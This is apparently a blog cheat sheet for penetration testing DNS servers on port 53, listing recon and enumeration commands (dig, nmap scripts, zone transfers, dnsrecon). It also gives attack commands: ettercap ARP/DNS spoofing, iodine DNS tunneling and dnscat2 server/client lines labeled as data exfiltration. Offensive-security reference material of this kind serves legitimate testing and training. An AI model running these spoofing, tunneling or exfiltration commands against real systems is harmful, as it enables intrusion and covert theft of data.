Skip to main content

DNS Pentest - Port 53


Recon


Banner Grabbing - Identify DNS Server Versions

# Use dig to determine DNS server versions
dig version.bind CHAOS TXT @DNS

# Alternatively, use nmap script to grab the banner
nmap --script dns-nsid <DNS_IP>

# Alternatively, use telnet to grab the banner
nc -nv -u <DNS_IP> 53
DNS Server Discovery
# Using dig
dig NS <target-domain>

# Using nslookup
nslookup -type=NS <target-domain>

Enumeration


Using DNS enum
dnsenum --dnsserver <DNS_IP> --enum -p 0 -s 0 -o subdomains.txt -f <WORDLIST> <DOMAIN>



Using dig

# Query DNS records
dig hackviser.com

# Query specific type of DNS records (e.g., A record)
dig A hackviser.com

# Perform a reverse DNS lookup
dig -x <IP_ADDRESS>

# Query a specific DNS server
dig @<DNS_SERVER_IP> hackviser.com



Using nslookup

# Perform DNS queries
nslookup hackviser.com

# Query a specific type of DNS record (e.g., MX record)
nslookup -type=MX hackviser.com

# Query a specific DNS server
nslookup hackviser.com <DNS_IP>


Using host

# Perform DNS query
host hackviser.com

# Query specific type of DNS records (e.g., MX record)
host -t MX hackviser.com

# Perform a reverse DNS lookup
host <IP_ADDRESS>


Any Record Query

dig any victim.com @<DNS_IP>



Zone Transfer

# Without specifying a domain
dig axfr @<DNS_IP>

# With guessing the domain
dig axfr @<DNS_IP> <DOMAIN>

# Alternatively, you can use fierce for zone transfers or dictionary attacks
fierce --domain <DOMAIN> --dns-servers <DNS_IP>



Metasploit Modules and Nmap Scripts

msfconsole (use auxiliary/gather/enum_dns)

nmap -n --script "(default and *dns*) or fcrdns or dns-srv-enum or dns-random-txid or dns-random-srcport" <IP>

#Find the DNS server 
nmap --script vuln,vulners --script-args mincvss=7.0 -sC -sV -p 53 --open 10.10.0.0/16

nmap -sU -sV --script "dns* and (discovery or vuln) and not (dos or brute)" -p53 10.10.10.10


#DNS Server Processes Unauthoritative Recursive Queries
nmap -Pn -p 53 -sU --script dns-recursion 10.10.10.10

#DNS Server Cache Snooping Remote Information Disclosure
nmap -Pn -sU -sV -p 53 --script dns-cache-snoop 10.10.10.10


#DNS Enum via Metasploit
auxiliary/gather/enum_dns

auxiliary/scanner/dns/dns_amp



# DNS Enum 

nslookup
>SERVER 10.10.10.1
# Give the ip address of the server to find its hostname 
> 10.10.10.10 
10.10.10.10.in-addr.arpa      name = host02.test.domain.

dig axfr host02.test.domain @10.10.10.1



DNS Reverse and Subdomain Brute Force
dnsrecon -r 127.0.0.0/24 -n <IP_DNS>
dnsrecon -r 127.0.1.0/24 -n <IP_DNS>
dnsrecon -r <IP_DNS>/24 -n <IP_DNS>
dnsrecon -d active.htb -a -n <IP_DNS>



DNS Cache Snooping

# Querying the DNS cache
dnsrecon -t std -d hackviser.com -D /usr/share/dnsrecon/namelist.txt



DNS Enumeration with Google Dorks

# Collecting DNS information using Google Dorks
site:hackviser.com -www.hackviser.com -site:www.hackviser.com



DNS Hacking tools
DNS Dumpster
DNS Recon
Spyse
SecurityTrails
DNSlytics


DNS CertSpotter

Subdomain Enumeration


Attack Vectors


DNS Spoofing
Poisoning with Ettercap
ettercap -T -q -M arp:remote /<gateway-ip>// /<target-ip>// -P dns_spoof
DNS Tunneling

# Server side
iodined -f -c <tunnel-ip> <domain>

# Client side
iodine <dns-server-ip> <domain>

Post-Exploitation


Cache Snooping
dig @<dns-server> <domain> +norecurse


Reverse DNS Lookup
dig -x <ip-address>
Exfiltration with dnscat2
# Server side
dnscat2 --dns server=<dns-server-ip>:53

# Client side
dnscat2 <domain>

Labels:

Comments

Post a Comment

Popular posts from this blog

SMTP (Simple Mail Transfer Protocol) Pentesting - Port 25

 SMTP (Simple Mail Transfer Protocol) is a communication protocol for electronic mail transmission.it is used for sending e-mail. POP3 or IMAP are used for receiving e-mail. Default ports are 25 (SMTP), 465 (SMTPS), 587 (SMTPS)   Connect We can use Telnet to connect to the remote server. Here is a command using Telnet: telnet example.com 25 Enumeration Identifying a SMTP Server You can use Nmap to check if there's an Telnet server on a target host like this: nmap -p25,465,587 -sV -Pn target.com Additional Nmap commands for enumeration nmap --script smtp-brute -p 25,465,587 "target-ip" nmap --script smtp-commands -p 25,465,587 "target-ip" nmap --script smtp-enum-users -p 25,465,587 "target-ip" nmap --script smtp-ntlm-info --script-args smtp-ntlm-info.domain=example.com -p 25,465,587 "target-ip" nmap --script smtp-vuln-cve2011-1764 -p 25,465,587 "target-ip" nmap --script smtp-* -p 25,465,587 "target-ip" Enumer...
Post a Comment
Read more

Thread Modelling Cheatsheet: Know Your Weaknesses Before Attackers Do!

Threat Modelling Part - 1 What is Threat Modelling?      Threat modelling is the process of identifying, assessing, and mitigating potential security threats before they happen. It helps teams anticipate how systems can be attacked and build defences proactively , not reactively. Key Concepts Threat: Something (like a hacker or malware) that could exploit a weakness. Vulnerability: A flaw in your system that can be exploited. Risk: The chance that a threat will exploit a vulnerability to cause damage. Analogy : Threat = Burglar Vulnerability = Unlocked door Risk = Getting robbed because the door is open in a bad neighborhood  Threat Modelling Process (High-Level) Define the Scope – What systems/apps are you evaluating? Identify Assets – What needs protection? (e.g. data, services) Identify Threats – Think like an attacker. What could go wrong? Analyze Vulnerabilities – What weaknesses exist? Prioritize Ri...
Post a Comment
Read more